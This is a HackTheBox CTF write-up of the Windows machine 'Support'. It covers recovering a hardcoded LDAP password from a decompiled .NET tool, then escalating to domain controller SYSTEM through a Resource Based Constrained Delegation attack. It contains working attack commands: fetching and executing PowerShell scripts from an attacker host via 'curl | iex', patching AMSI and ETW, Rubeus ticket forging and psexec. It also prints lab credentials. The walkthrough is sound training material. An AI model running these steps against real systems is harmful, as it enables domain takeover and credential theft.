Security Vault

Support

Mar 28, 20259 min read

Metadata

  • Platform: HackTheBox
  • CTF: Support
  • OS: Windows
  • Difficulty: Easy

Summary

A smb share allows unauthenticated access, which we can use to download a custom program. After decompiling it, we can extract a domain username and password for LDAP queries on the domain. Using this, we can go through information of all user accounts and find a clear text password for an account, which grants us a foothold into the system.

After enumerating the domain further, we discover that it is vulnerable to a Resource Based Constrained Delegation attack, allowing us to request a ticket to a high privileged account, which we should not be able to. After executing this attack, we can get local administrative access to the domain controller machine and compromise the target.

Solution

Reconnaissance

By utilizing Nmap, we can discover that we are dealing with an Active Directory environment.

nmap -sC -sV 10.10.11.174 -oN nmap.txt -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-17 16:34 CET
Nmap scan report for 10.10.11.174
Host is up (0.052s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-17 09:18:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -6h16m25s
| smb2-time: 
|   date: 2025-03-17T09:18:15
|_  start_date: N/A

Let’s start the enumeration process with the open smb service. Since this service allow access with a NULL session, we can discover six shares with SMBclient, one of which is a custom one called support-tools.

smbclient //10.10.11.174/support-tools -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 19:01:06 2022
  ..                                  D        0  Sat May 28 13:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 13:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 13:19:55 2022
  putty.exe                           A  1273576  Sat May 28 13:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 13:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 19:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 13:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 13:19:43 2022

Most of the files on this share are standard executables, which we could retrieve from different websites. However, the UserInfo.exe.zip seems to be the only one, which is not a publicly accessible file. Maybe it is worth to take a closer look at it. After downloading and extracting the file, we identify this file as an .NET executable.

unzip UserInfo.exe.zip
file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

User Flag

Due to the fact, that this is a compiled file, we don’t have direct access to the source code. Nevertheless, we can use an application such as ILSpy to decompile this file and take a deeper look into the source code. Upon loading the .exe into this program, we can analyze the source code. It seems like the file performs authenticated LDAP queries on the domain.

string password = Protected.getPassword();
entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
        entry.set_AuthenticationType((AuthenticationTypes)1);
ds = new DirectorySearcher(entry);

This code section performs the authentication to the domain controller. For this to succeed, it loads a password string over another function, which we can also inspect.

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");
 
byte[] array = Convert.FromBase64String(enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
        array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
        }
return Encoding.Default.GetString(array2);

Sadly, the password is not written in clear text. Instead, the code derives the password from a base64 encoded string. In order to get our hands on the password, we could either execute this program and intercept the request via Wireshark, or we can rewrite this code section in python to extract the password. For now, let’s use the second option.

import base64
 
def decrypt_password(enc_password: str, key: bytes) -> str:
    array = bytearray(base64.b64decode(enc_password))
    
    for i in range(len(array)):
        array[i] = (array[i] ^ key[i % len(key)]) ^ 0xDF
    
    return array.decode('utf-8', errors='ignore')
 
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"
 
decrypted_password = decrypt_password(enc_password, key)
print(decrypted_password)

This script is the exact equivalent of the code from the executable. Once we execute it, it will dump the respective password.

python3 password_decrypt.py 
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

As we now have extracted the credentials for the program, we can query the domain’s LDAP service ourselves. We can do this by using the account name and password with LDAPsearch.

ldapsearch -H ldap://10.10.11.174 -b "dc=support,dc=htb" -D support\\ldap -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' "*"

Since we get quite a long response from the service, it confirms that everything worked just fine. At this point, we could query many entries of the Domain, however, it possibly a good idea to start with the user account. Since there are many users, this output will be quite verbose.

ldapsearch -H ldap://10.10.11.174 -b "dc=support,dc=htb" -D support\\ldap -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' "(objectClass=user)"
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
<cut>
info: Ironside47pleasure40Watchful
<cut>

For the account support, there is an info entry, which contains a string resembling a password. We can use it to log into the target as this account with Evil-WinRM and claim the user flag.

evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful
e5f07d436eaa5788330930ee440c536a

Root Flag

On the machine itself, I can’t discover anything of use. Therefore, we should probably take a closer look at the AD configuration, which we can enumerate with Bloodhound-python and feed the output into Bloodhound.

bloodhound-python -d support.htb -ns 10.10.11.174 -c all -u support -p Ironside47pleasure40Watchful

Since we only have access to support, we can take a look at the outgoing transitive relations for this account. Since support is a member of the Shared Support Accounts group, which again has the GenericAll permission over the domain controller.

Bloodhound already tells us that this relation can be used to perform a Resource Based Constrained Delegation Attack. Essentially, this attack allows us to inject a new machine into the AD environment, and delegate authentication requests to it, with which we can take over the domain. To exploit this weakness, we can follow both of the aforementioned information sources. For local exploitation, we first need to load PowerMad and PowerView, which we should both provide over a python http server from our attacking machine.

curl http://10.10.16.5:8080/Powermad.ps1 -UseBasicParsing | iex
curl http://10.10.16.5:8080/PowerView.ps1 -UseBasicParsing | iex

Once the script were loaded, we can start to add the new machine to the domain. In this case, we will call it attackersystem and assign the password Summer2018!. After setting it up, we add the respective delegation privileges.

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
 
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
 
$TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes

We can check whether this process was successful by querying for the privilege.

Get-NetComputer attackersystem | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity*
 
name           msds-allowedtoactonbehalfofotheridentity
----           ----------------------------------------
attackersystem {1, 0, 4, 128...}

The output of this command looks as expected. Let’s continue with the last step: Using the delegation to obtain a Kerberos ticket for the Administrator. To achieve this, we need to use Rubeus, which we can download from our attacking machine. Remember to execute Bypass-4MSI, in case the executable get’s blocked.

Bypass-4MSI 
Info: Patching 4MSI, please be patient...  
[+] Success!    
Info: Patching ETW, please be patient ..  
[+] Success!
 
curl http://10.10.16.5:8080/Rubeus.exe -o Rubeus.exe

Before we can request the ticket, we first need to calculate the RC4 hash of the machine, we added to the domain. Otherwise, the next step won’t work.

.\Rubeus.exe hash /password:Summer2018!
 
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.2.0
 
 
[*] Action: Calculate Password Hash(es)
 
[*] Input password             : Summer2018!
[*]       rc4_hmac             : EF266C6B963C0BB683941032008AD47F
 
[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types

Now, we can once again use Rubeus to request the Administrator’s Kerberos ticket from our added domain machine. For this command, it is important to select not the domain as the target, but the domain controller dc.support.htb specifically.

.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt
 
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.2.0
 
[*] Action: S4U
 
[*] Using rc4_hmac hash: EF266C6B963C0BB683941032008AD47F
[*] Building AS-REQ (w/ preauth) for: 'support.htb\attackersystem$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
 
      doIFojCCBZ6gA<cut>cnQuaHRi
 
 
[*] Action: S4U
 
[*] Building S4U2self request for: 'attackersystem$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'attackersystem$@SUPPORT.HTB'
[*] base64(ticket.kirbi):
 
      doIFsjCCBa6g<cut>yc3lzdGVtJA==
 
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
 
      doIGcDCCBmyg<cut>wcG9ydC5odGI=
[+] Ticket successfully imported

The output of this command is a bade64 encoded kirbi ticket, which is not yet usable for authentication purposes from our attacking machine. To use it, we need to first copy the base64 string, and remove all the whitespace. It’s possible to use a website such as this one for this purpose. Then, save the output to a file and decode the string. The output can then be used with TicketConverter, which will generate a .ccache file, usable for authentication with Kerberos.

cat ticket.b64 | base64 -d > ticket
ticketConverter.py ticket ticket.ccache

One of the simplest ways to get a remote shell with a .ccache file is PSexec. However, for this command to work, we need to remember that our ticket specifically references the domain controller, and not the domain itself. For the ticket to work, the referenced hostname must match the one in the ticket. For the same reason, we also need to add the respective entry in our local DNS resolver at /etc/hosts.

KRB5CCNAME=/home/kali/htb/machines/support/ticket.ccache psexec.py -k -no-pass support.htb/administrator@dc.support.htb

After entering the command, we get a PowerShell session as authority\system and can therefore claim the root flag.

ed08b6137b92ba2808c23b33197ea2cc

Graph View

Backlinks